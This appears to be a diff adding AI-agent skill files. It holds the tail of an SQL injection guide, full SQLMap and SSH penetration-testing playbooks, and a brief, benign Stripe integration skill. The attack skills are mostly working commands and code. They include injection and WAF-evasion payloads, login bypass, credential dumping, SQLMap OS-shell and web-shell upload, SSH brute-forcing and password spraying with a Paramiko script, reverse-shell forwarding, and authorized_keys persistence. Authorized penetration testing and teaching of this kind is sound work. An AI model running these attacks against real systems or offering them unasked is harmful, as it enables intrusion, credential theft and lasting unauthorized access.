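# Vulnerable: string concatenation lets the -- comment cut off the password check
rows = db.execute(
    f"SELECT * FROM users WHERE username='{user}' AND password='{pwd}'"
).fetchall()
print(len(rows))  # 1 -> authenticated without knowing the password

# Safe: placeholders bind the payload as a literal username, which matches nothing
rows = db.execute(
    "SELECT * FROM users WHERE username=? AND password=?", (user, pwd)
).fetchall()
print(len(rows))  # 0 -> bypass fails
```

The same placeholder discipline (`?`, `%s`, or named parameters, depending on the driver) defeats every payload in this section, which is why "Parameterized queries prevent standard injection" appears under the limitations below.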

### Phase 4: Filter Bypass Techniques

#### Character Encoding Bypass
When special characters are blocked:

```sql
-- URL encoding
%27 (single quote)
%22 (double quote)
%23 (hash)

-- Double URL encoding
%2527 (single quote)

-- Unicode alternatives
U+0027 (apostrophe)
U+02B9 (modifier letter prime)

-- Hexadecimal strings (MySQL)
SELECT * FROM users WHERE name=0x61646D696E -- 'admin' in hex
```

#### Whitespace Bypass
Substitute blocked spaces:

```sql
-- Comment substitution
SELECT/**/username/**/FROM/**/users
SEL/**/ECT/**/username/**/FR/**/OM/**/users

-- Alternative whitespace
SELECT%09username%09FROM%09users -- Tab character
SELECT%0Ausername%0AFROM%0Ausers -- Newline
```

#### Keyword Bypass
Evade blacklisted SQL keywords:

```sql
-- Case variation
SeLeCt, sElEcT, SELECT

-- Inline comments
SEL/*bypass*/ECT
UN/*bypass*/ION

-- Double writing (if the filter strips keywords in a single pass)
SELSELECTECT → SELECT
UNUNIONION → UNION

-- Null byte injection
%00SELECT
SEL%00ECT
```
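The double-writing trick works against any sanitizer that strips blacklisted keywords in one pass and never re-scans its own output; a minimal sketch of such a flawed filter (the filter itself is hypothetical, written only to demonstrate the flaw):

```python
# A naive single-pass sanitizer: deleting "UNION" from "UNUNIONION" leaves
# the outer halves, which reassemble into "UNION" after the pass.
def naive_filter(payload: str) -> str:
    for keyword in ("SELECT", "UNION"):
        payload = payload.replace(keyword, "")
    return payload

print(naive_filter("UNION SELECT password FROM users"))  # keywords stripped
print(naive_filter("UNUNIONION SELSELECTECT password"))  # UNION SELECT password
```

A robust filter would loop until a pass removes nothing, though rejecting or parameterizing the input remains the only reliable fix.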

## Quick Reference

### Detection Test Sequence
```
1. Insert ' → Check for error
2. Insert " → Check for error
3. Try: OR 1=1-- → Check for behavior change
4. Try: AND 1=2-- → Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay
```

### Database Fingerprinting
```sql
-- MySQL
SELECT @@version
SELECT version()

-- MSSQL
SELECT @@version
SELECT @@servername

-- PostgreSQL
SELECT version()

-- Oracle
SELECT banner FROM v$version
SELECT * FROM v$version
```

### Information Schema Queries
```sql
-- MySQL/MSSQL table enumeration
SELECT table_name FROM information_schema.tables WHERE table_schema=database()

-- Column enumeration
SELECT column_name FROM information_schema.columns WHERE table_name='users'

-- Oracle equivalent
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
```

### Common Payloads Quick List
| Purpose | Payload |
|---------|---------|
| Basic test | `'` or `"` |
| Boolean true | `OR 1=1--` |
| Boolean false | `AND 1=2--` |
| Comment (MySQL) | `#` or `-- ` |
| Comment (MSSQL) | `--` |
| UNION probe | `UNION SELECT NULL--` |
| Time delay | `AND SLEEP(5)--` |
| Auth bypass | `' OR '1'='1` |

## Constraints and Guardrails

### Operational Boundaries
- Never execute destructive queries (DROP, DELETE, TRUNCATE) without explicit authorization
- Limit data extraction to proof-of-concept quantities
- Avoid denial of service through resource-intensive queries
- Stop immediately upon detecting a production database with real user data

### Technical Limitations
- WAF/IPS may block common payloads, requiring evasion techniques
- Parameterized queries prevent standard injection
- Some blind injection requires extensive requests (rate-limiting concerns)
- Second-order injection requires understanding of data flow

### Legal and Ethical Requirements
- A written scope agreement must exist before testing
- Document all extracted data and handle it per data protection requirements
- Report critical vulnerabilities immediately through agreed channels
- Never access data beyond scope requirements

## Examples

### Example 1: E-commerce Product Page SQLi

**Scenario**: Testing a product display page with an ID parameter

**Initial Request**:
```
GET /product.php?id=5 HTTP/1.1
```

**Detection Test**:
```
GET /product.php?id=5' HTTP/1.1
Response: MySQL error - syntax error near '''
```

**Column Enumeration**:
```
GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
Response: Normal
GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
Response: Error (4 columns confirmed)
```

**Data Extraction**:
```
GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
Response: Displays admin credentials
```

### Example 2: Blind Time-Based Extraction

**Scenario**: No visible output; testing for blind injection

**Confirm Vulnerability**:
```sql
id=5' AND SLEEP(5)--
-- Response delayed by 5 seconds (vulnerability confirmed)
```

**Extract Database Name Length**:
```sql
id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
-- Delay confirms the database name is 8 characters
```

**Extract Characters**:
```sql
id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
-- Iterate through characters to extract: 'appstore'
```

### Example 3: Login Bypass

**Target**: Admin login form

**Standard Login Query**:
```sql
SELECT * FROM users WHERE username='[input]' AND password='[input]'
```

**Injection Payload**:
```
Username: administrator'--
Password: anything
```

**Resulting Query**:
```sql
SELECT * FROM users WHERE username='administrator'--' AND password='anything'
```

**Result**: Password check bypassed; authenticated as administrator.

## Troubleshooting

### No Error Messages Displayed
- The application uses generic error handling
- Switch to blind injection techniques (boolean- or time-based)
- Monitor response length differences instead of content

### UNION Injection Fails
- Column count may be incorrect → test with ORDER BY
- Data types may mismatch → use NULL for all columns first
- Results may not display → find injectable column positions

### WAF Blocking Requests
- Use encoding techniques (URL, hex, Unicode)
- Insert inline comments within keywords
- Try alternative syntax for the same operations
- Fragment the payload across multiple parameters

### Payload Not Executing
- Verify the correct comment syntax for the database type
- Check whether the application uses parameterized queries
- Confirm input reaches the SQL query (not filtered client-side)
- Test different injection points (headers, cookies)

### Time-Based Injection Inconsistent
- Network latency may cause false positives
- Use longer delays (10+ seconds) for clarity
- Run multiple tests to confirm the pattern
- Consider server-side caching effects
---

**skills/sqlmap-database-pentesting/SKILL.md** (new file, 397 lines)

---
name: SQLMap Database Penetration Testing
description: This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
---

# SQLMap Database Penetration Testing

## Purpose

Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.

## Inputs / Prerequisites

- **Target URL**: Web application URL with an injectable parameter (e.g., `?id=1`)
- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
- **Authorization**: Written permission for penetration testing activities

## Outputs / Deliverables

- **Database Enumeration**: List of all databases on the target server
- **Table Structure**: Complete table names within the target database
- **Column Mapping**: Column names and data types for each table
- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
- **Hash Values**: Password hashes for offline cracking
- **Vulnerability Report**: Confirmation of SQL injection type and severity

## Core Workflow

### 1. Identify SQL Injection Vulnerability

#### Manual Verification
```bash
# Add single quote to break query
http://target.com/page.php?id=1'

# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"
```

#### Initial SQLMap Scan
```bash
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch

# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
```

### 2. Enumerate Databases

#### List All Databases
```bash
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
```

**Key Options:**
- `-u`: Target URL with injectable parameter
- `--dbs`: Enumerate database names
- `--batch`: Use default answers (non-interactive mode)

### 3. Enumerate Tables

#### List Tables in Specific Database
```bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
```

**Key Options:**
- `-D`: Specify target database name
- `--tables`: Enumerate table names

### 4. Enumerate Columns

#### List Columns in Specific Table
```bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
```

**Key Options:**
- `-T`: Specify target table name
- `--columns`: Enumerate column names

### 5. Extract Data

#### Dump Specific Table Data
```bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
```

#### Dump Specific Columns
```bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
```

#### Dump Entire Database
```bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
```

**Key Options:**
- `--dump`: Extract all data from the specified table
- `--dump-all`: Extract all data from all tables
- `-C`: Specify column names to extract

### 6. Advanced Target Options

#### Target from HTTP Request File
```bash
# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batch
```

#### Target from Log File
```bash
# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batch
```

#### Target Multiple URLs (Bulk File)
```bash
# Create file with URLs, one per line:
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch
```

#### Target via Google Dorks (Use with Caution)
```bash
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batch
```

## Quick Reference Commands

### Database Enumeration Progression

| Stage | Command |
|-------|---------|
| List Databases | `sqlmap -u "URL" --dbs --batch` |
| List Tables | `sqlmap -u "URL" -D dbname --tables --batch` |
| List Columns | `sqlmap -u "URL" -D dbname -T tablename --columns --batch` |
| Dump Data | `sqlmap -u "URL" -D dbname -T tablename --dump --batch` |
| Dump All | `sqlmap -u "URL" -D dbname --dump-all --batch` |

### Supported Database Management Systems

| DBMS | Support Level |
|------|---------------|
| MySQL | Full Support |
| PostgreSQL | Full Support |
| Microsoft SQL Server | Full Support |
| Oracle | Full Support |
| Microsoft Access | Full Support |
| IBM DB2 | Full Support |
| SQLite | Full Support |
| Firebird | Full Support |
| Sybase | Full Support |
| SAP MaxDB | Full Support |
| HSQLDB | Full Support |
| Informix | Full Support |

### SQL Injection Techniques

| Technique | Description | Flag |
|-----------|-------------|------|
| Boolean-based blind | Infers data from true/false responses | `--technique=B` |
| Time-based blind | Uses time delays to infer data | `--technique=T` |
| Error-based | Extracts data from error messages | `--technique=E` |
| UNION query-based | Uses UNION to append results | `--technique=U` |
| Stacked queries | Executes multiple statements | `--technique=S` |
| Out-of-band | Uses DNS or HTTP for exfiltration | `--technique=Q` |

### Essential Options

| Option | Description |
|--------|-------------|
| `-u` | Target URL |
| `-r` | Load HTTP request from file |
| `-l` | Parse targets from Burp/WebScarab log |
| `-m` | Bulk file with multiple targets |
| `-g` | Google dork (use responsibly) |
| `--dbs` | Enumerate databases |
| `--tables` | Enumerate tables |
| `--columns` | Enumerate columns |
| `--dump` | Dump table data |
| `--dump-all` | Dump all database data |
| `-D` | Specify database |
| `-T` | Specify table |
| `-C` | Specify columns |
| `--batch` | Non-interactive mode |
| `--random-agent` | Use random User-Agent |
| `--level` | Level of tests (1-5) |
| `--risk` | Risk of tests (1-3) |

## Constraints and Limitations

### Operational Boundaries
- Requires a valid injectable parameter in the target URL
- Network connectivity to the target database server required
- Large database dumps may take significant time
- Some WAF/IPS systems may block SQLMap traffic
- Time-based attacks are significantly slower than error-based

### Performance Considerations
- Use `--threads` to speed up enumeration (default: 1)
- Limit dumps with `--start` and `--stop` for large tables
- Use `--technique` to specify a faster injection method if known

### Legal Requirements
- Only test systems with explicit written authorization
- Google dork attacks against unknown sites are illegal
- Document all testing activities and findings
- Respect scope limitations defined in the rules of engagement

### Detection Risk
- SQLMap generates significant log entries
- Use `--random-agent` to vary the User-Agent header
- Consider `--delay` to avoid triggering rate limits
- Proxy through Tor with `--tor` for anonymity (authorized tests only)

## Examples

### Example 1: Complete Database Enumeration
```bash
# Step 1: Discover databases
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
# Result: acuart database found

# Step 2: List tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
# Result: users, products, carts, etc.

# Step 3: List columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
# Result: username, password, email columns

# Step 4: Dump user credentials
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
```

### Example 2: POST Request Injection
```bash
# Save Burp request to file (login.txt):
# POST /login.php HTTP/1.1
# Host: target.com
# Content-Type: application/x-www-form-urlencoded
#
# username=admin&password=test

# Run SQLMap with request file
sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
```

### Example 3: Bulk Target Scanning
```bash
# Create bulkfile.txt:
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt

# Scan all targets
sqlmap -m bulkfile.txt --dbs --batch
```

### Example 4: Aggressive Testing
```bash
# High level and risk for thorough testing
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3

# Specify all techniques
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
```

### Example 5: Extract Specific Credentials
```bash
# Target specific columns
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T admin_users \
  -C admin_name,admin_pass,admin_email \
  --dump --batch

# Automatically crack password hashes
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T users \
  --dump --batch \
  --passwords
```

### Example 6: OS Shell Access (Advanced)
```bash
# Get interactive OS shell (requires DBA privileges)
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch

# Execute specific OS command
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch

# File read from server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch

# File upload to server
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
```

## Troubleshooting

### Issue: "Parameter does not seem injectable"
**Cause**: SQLMap cannot find an injection point
**Solution**:
```bash
# Increase testing level and risk
sqlmap -u "URL" --dbs --batch --level=5 --risk=3

# Specify parameter explicitly
sqlmap -u "URL" -p "id" --dbs --batch

# Try different injection techniques
sqlmap -u "URL" --dbs --batch --technique=BT

# Add prefix/suffix for filter bypass
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
```

### Issue: Target Behind WAF/Firewall
**Cause**: Web application firewall blocking requests
**Solution**:
```bash
# Use tamper scripts
sqlmap -u "URL" --dbs --batch --tamper=space2comment

# List available tamper scripts
sqlmap --list-tampers

# Common tamper combinations
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase

# Add delay between requests
sqlmap -u "URL" --dbs --batch --delay=2

# Use random User-Agent
sqlmap -u "URL" --dbs --batch --random-agent
```
|
||||
### Issue: Connection Timeout
|
||||
**Cause**: Network issues or slow target
|
||||
**Solution**:
|
||||
```bash
|
||||
# Increase timeout
|
||||
sqlmap -u "URL" --dbs --batch --timeout=60
|
||||
|
||||
# Reduce threads
|
||||
sqlmap -u "URL" --dbs --batch --threads=1
|
||||
|
||||
# Add retries
|
||||
sqlmap -u "URL" --dbs --batch --retries=5
|
||||
```
|
||||
|
||||
### Issue: Time-Based Attacks Too Slow
|
||||
**Cause**: Default time delay too conservative
|
||||
**Solution**:
|
||||
```bash
|
||||
# Reduce time delay (risky, may cause false negatives)
|
||||
sqlmap -u "URL" --dbs --batch --time-sec=3
|
||||
|
||||
# Use boolean-based instead if possible
|
||||
sqlmap -u "URL" --dbs --batch --technique=B
|
||||
```
|
||||
|
||||
### Issue: Cannot Dump Large Tables
|
||||
**Cause**: Table has too many records
|
||||
**Solution**:
|
||||
```bash
|
||||
# Limit number of records
|
||||
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
|
||||
|
||||
# Dump specific columns only
|
||||
sqlmap -u "URL" -D db -T table -C username,password --dump --batch
|
||||
|
||||
# Exclude specific columns
|
||||
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
|
||||
```
|
||||
|
||||
### Issue: Session Drops During Long Scan
|
||||
**Cause**: Session timeout or connection reset
|
||||
**Solution**:
|
||||
```bash
|
||||
# Save and resume session
|
||||
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
|
||||
|
||||
# Resume from saved session
|
||||
sqlmap -u "URL" --dbs --batch --resume
|
||||
|
||||
# Use persistent HTTP connection
|
||||
sqlmap -u "URL" --dbs --batch --keep-alive
|
||||
```
|
||||
skills/ssh-penetration-testing/SKILL.md (new file, 485 lines)
---
name: SSH Penetration Testing
description: This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". It provides comprehensive SSH penetration testing methodologies and techniques.
---

# SSH Penetration Testing

## Purpose

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

## Prerequisites

### Required Tools

- Nmap with SSH scripts
- Hydra or Medusa for brute-forcing
- ssh-audit for configuration analysis
- Metasploit Framework
- Python with the Paramiko library

### Required Knowledge

- SSH protocol fundamentals
- Public/private key authentication
- Port forwarding concepts
- Linux command-line proficiency

## Outputs and Deliverables

1. **SSH Enumeration Report** - Versions, algorithms, configurations
2. **Credential Assessment** - Weak passwords, default credentials
3. **Vulnerability Assessment** - Known CVEs, misconfigurations
4. **Tunnel Documentation** - Port forwarding configurations

## Core Workflow

### Phase 1: SSH Service Discovery

Identify SSH services on target networks:

```bash
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100
```

### Phase 2: SSH Enumeration

Gather detailed information about SSH services:

```bash
# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
```

### Phase 3: SSH Configuration Auditing

Identify weak configurations:

```bash
# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with a specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions
```

Key configuration weaknesses to identify:

- Weak key exchange algorithms (diffie-hellman-group1-sha1)
- Weak ciphers (arcfour, 3des-cbc)
- Weak MACs (hmac-md5, hmac-sha1-96)
- Deprecated protocol versions

### Phase 4: Credential Attacks

#### Brute-Force with Hydra

```bash
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With a specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate-limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100
```

#### Brute-Force with Medusa

```bash
# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With a username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
```

#### Password Spraying

```bash
# Test a common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
  hydra -L users.txt -p "$pass" ssh://192.168.1.100
done
```

### Phase 5: Key-Based Authentication Testing

Test for weak or exposed keys:

```bash
# Attempt login with a found private key
ssh -i id_rsa user@192.168.1.100

# Specify the key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# Force password authentication
ssh -o PreferredAuthentications=password user@192.168.1.100

# Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
  ssh -i "$key" user@192.168.1.100
done
```

Check for exposed keys:

```bash
# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz
```

### Phase 6: Vulnerability Exploitation

Search for known vulnerabilities:

```bash
# Search for exploits
searchsploit openssh
searchsploit openssh 7.2

# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration
# CVE-2016-0777 - Roaming vulnerability
# CVE-2016-0778 - Buffer overflow

# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
```

### Phase 7: SSH Tunneling and Port Forwarding

#### Local Port Forwarding

Forward a local port to a remote service:

```bash
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server

# Access an internal web server through SSH
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
# Now access http://localhost:8080

# Access an internal database
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100

# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100
```

#### Remote Port Forwarding

Expose a local service to the remote network:

```bash
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server

# Expose a local web server to the remote host
ssh -R 8080:localhost:80 user@192.168.1.100
# Remote can access it via localhost:8080

# Reverse shell callback
ssh -R 4444:localhost:4444 user@192.168.1.100
```

#### Dynamic Port Forwarding (SOCKS Proxy)

Create a SOCKS proxy for network pivoting:

```bash
# Create a SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.100

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24

# Browser configuration
# Set SOCKS proxy to localhost:1080
```

#### ProxyJump (Jump Hosts)

Chain through multiple SSH servers:

```bash
# Jump through an intermediate host
ssh -J user1@jump_host user2@target_host

# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target

# With SSH config
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump user@192.168.1.100
```

### Phase 8: Post-Exploitation

Activities after gaining SSH access:

```bash
# Check sudo privileges
sudo -l

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check the SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

# Add persistence (add your key)
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys

# Extract the SSH configuration
cat /etc/ssh/sshd_config

# Find other users
grep -v nologin /etc/passwd
ls /home/

# Search history for credentials
grep -i ssh ~/.bash_history
grep -i pass ~/.bash_history
```

### Phase 9: Custom SSH Scripts with Paramiko

Python-based SSH automation:

```python
#!/usr/bin/env python3
import paramiko


def ssh_connect(host, username, password):
    """Attempt an SSH connection with the given credentials."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        client.connect(host, username=username, password=password, timeout=5)
        print(f"[+] Success: {username}:{password}")
        return client
    except paramiko.AuthenticationException:
        print(f"[-] Failed: {username}:{password}")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


def execute_command(client, command):
    """Execute a command via SSH."""
    stdin, stdout, stderr = client.exec_command(command)
    output = stdout.read().decode()
    errors = stderr.read().decode()
    return output, errors


def ssh_brute_force(host, username, wordlist):
    """Brute-force SSH with a wordlist."""
    with open(wordlist, 'r') as f:
        passwords = f.read().splitlines()

    for password in passwords:
        client = ssh_connect(host, username, password.strip())
        if client:
            # Run post-exploitation commands
            output, _ = execute_command(client, 'id; uname -a')
            print(output)
            client.close()
            return True
    return False


# Usage
if __name__ == "__main__":
    target = "192.168.1.100"
    user = "admin"

    # Single credential test
    client = ssh_connect(target, user, "password123")
    if client:
        output, _ = execute_command(client, "ls -la")
        print(output)
        client.close()
```

### Phase 10: Metasploit SSH Modules

Use Metasploit for comprehensive SSH testing:

```bash
# Start Metasploit
msfconsole

# SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# SSH Login Brute-Force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run

# SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
set KEY_FILE /path/to/id_rsa
run

# Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run

# Post-exploitation with an SSH session
sessions -i 1
```

## Quick Reference

### SSH Enumeration Commands

| Command | Purpose |
|---------|---------|
| `nc <host> 22` | Banner grabbing |
| `ssh-audit <host>` | Configuration audit |
| `nmap --script ssh*` | SSH NSE scripts |
| `searchsploit openssh` | Find exploits |

### Brute-Force Options

| Tool | Command |
|------|---------|
| Hydra | `hydra -l user -P pass.txt ssh://host` |
| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |
| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |
| Metasploit | `use auxiliary/scanner/ssh/ssh_login` |

### Port Forwarding Types

| Type | Command | Use Case |
|------|---------|----------|
| Local | `-L 8080:target:80` | Access remote services locally |
| Remote | `-R 8080:localhost:80` | Expose local services remotely |
| Dynamic | `-D 1080` | SOCKS proxy for pivoting |

### Common SSH Ports

| Port | Description |
|------|-------------|
| 22 | Default SSH |
| 2222 | Common alternate |
| 22222 | Another alternate |
| 830 | NETCONF over SSH |

## Constraints and Limitations

### Legal Considerations

- Always obtain written authorization
- Brute-forcing may violate terms of service
- Document all testing activities

### Technical Limitations

- Rate limiting may block attacks
- Fail2ban or similar may ban IPs
- Key-based auth prevents password attacks
- Two-factor authentication adds complexity

### Evasion Techniques

- Use slow brute-force: `-t 1 -w 5`
- Distribute attacks across IPs
- Use timing-based enumeration carefully
- Respect lockout thresholds

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Connection refused | Verify SSH is running; check firewall; confirm the port; test from a different IP |
| Authentication failures | Verify the username; check the password policy; key permissions (600); authorized_keys format |
| Tunnel not working | Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |
skills/stripe-integration/SKILL.md (new file, 69 lines)
---
name: stripe-integration
description: "Get paid from day one. Payments, subscriptions, billing portal, webhooks, metered billing, Stripe Connect. The complete guide to implementing Stripe correctly, including all the edge cases that will bite you at 3am. This isn't just API calls - it's the full payment system: handling failures, managing subscriptions, dealing with dunning, and keeping revenue flowing. Use when: stripe, payments, subscription, billing, checkout."
source: vibeship-spawner-skills (Apache 2.0)
---

# Stripe Integration

You are a payments engineer who has processed billions in transactions. You've seen every edge case - declined cards, webhook failures, subscription nightmares, currency issues, refund fraud. You know that payments code must be bulletproof because errors cost real money. You're paranoid about race conditions, idempotency, and webhook verification.

## Capabilities

- stripe-payments
- subscription-management
- billing-portal
- stripe-webhooks
- checkout-sessions
- payment-intents
- stripe-connect
- metered-billing
- dunning-management
- payment-failure-handling

## Requirements

- supabase-backend

## Patterns

### Idempotency Key Everything

Use idempotency keys on all payment operations to prevent duplicate charges

### Webhook State Machine

Handle webhooks as state transitions, not triggers
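A sketch of the transition idea (the event names are real Stripe webhook types; the state table and handler wiring are illustrative): the handler computes the next local state from the current one, so duplicate or out-of-order deliveries cannot regress a subscription.

```javascript
// Allowed local subscription states and the Stripe events that move
// between them. Transitions not listed are ignored, not applied blindly.
const TRANSITIONS = {
  'none':     { 'customer.subscription.created': 'active' },
  'active':   { 'invoice.payment_failed': 'past_due',
                'customer.subscription.deleted': 'canceled' },
  'past_due': { 'invoice.payment_succeeded': 'active',
                'customer.subscription.deleted': 'canceled' },
  'canceled': {},
};

function nextSubscriptionState(current, eventType) {
  const moves = TRANSITIONS[current] || {};
  // Unknown, duplicate, or out-of-order events leave the state unchanged.
  return moves[eventType] || current;
}
```

In a real endpoint you would verify the payload first (Stripe's `stripe.webhooks.constructEvent(rawBody, signature, secret)`) and only then apply the transition to your stored state.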

### Test Mode Throughout Development

Use Stripe test mode with real test cards for all development

## Anti-Patterns

### ❌ Trust the API Response

### ❌ Webhook Without Signature Verification

### ❌ Subscription Status Checks Without Refresh

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Not verifying webhook signatures | critical | Always verify signatures |
| JSON middleware parsing body before webhook can verify | critical | Next.js App Router: pass the raw body to verification |
| Not using idempotency keys for payment operations | high | Always use idempotency keys |
